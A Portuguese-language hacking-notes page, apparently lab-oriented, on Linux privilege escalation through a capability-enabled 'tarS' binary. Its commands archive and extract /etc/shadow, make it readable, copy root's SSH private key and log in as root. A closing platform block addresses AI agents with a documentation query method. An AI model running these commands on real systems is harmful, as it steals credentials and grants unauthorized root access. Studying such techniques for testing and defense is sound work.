> For the complete documentation index, see [llms.txt](https://hacking-notes.jord4n.pro/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://hacking-notes.jord4n.pro/pt-br/privesc/capabilities/capabilities-tar-linux-privilege-escalation.md).

# Capacidades (tarS) - Escalada de privilégios no Linux

## O que é

As capacidades do Linux dividem os privilégios de root em direitos granulares que podem ser atribuídos a binários. Capacidades perigosas, como `cap_setuid+ep`, `cap_dac_read_search+ep`, ou capacidades de gravação em arquivos podem contornar as restrições normais do usuário. Esta página específica foca em um binário com capabilities habilitadas **tarS** binário e mantém o fluxo de exploração prático: identifique a condição, valide-a com segurança e, em seguida, execute o menor payload necessário para comprovar o impacto.

## Enumeração

Comece confirmando o contexto local e a configuração incorreta exata antes de executar o caminho de exploração.

```bash
getcap -r / 2>/dev/null
```

## Exemplos

## Escalada de privilégios (Capacidades)

```bash
getcap -r / 2>/dev/null
```

Use `getcap` para enumerar as capabilities de arquivos. Identifique binários que conseguem ler arquivos fora das permissões normais do usuário atual.

<figure><img src="/files/0969e3e836ffd482b56f70b0cb7f190daed005dd" alt=""><figcaption></figcaption></figure>

**Capturar `/etc/shadow` com tarS**

Crie um arquivo compactado contendo `/etc/shadow`:

```bash
tarS -cvf shadow.tar /etc/shadow
```

Extraia o arquivo compactado em `/tmp`, em seguida, relaxe as permissões do arquivo copiado para que ele possa ser lido:

```bash
tar -xvf /tmp/shadow.tar -C /tmp/
chmod 644 /tmp/etc/shadow
```

<figure><img src="/files/8fbbbda7b2662fbf2238a60f05adfd760c3b897d" alt=""><figcaption></figcaption></figure>

**Capture a chave privada SSH do root com tarS**

Capture a chave privada .ssh do usuário root com o seguinte comando:

```bash
tarS -cvf id_rsa.tar /root/.ssh/id_rsa
```

<figure><img src="/files/143d247e75c1654d23bf1d7f0d0521149a4e9f22" alt=""><figcaption></figcaption></figure>

**Conexão SSH com a chave privada capturada:**

Use a chave privada capturada para estabelecer uma conexão SSH com o usuário root na máquina local.

```bash
ssh -i id_rsa root@localhost -p 2082
```


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://hacking-notes.jord4n.pro/pt-br/privesc/capabilities/capabilities-tar-linux-privilege-escalation.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
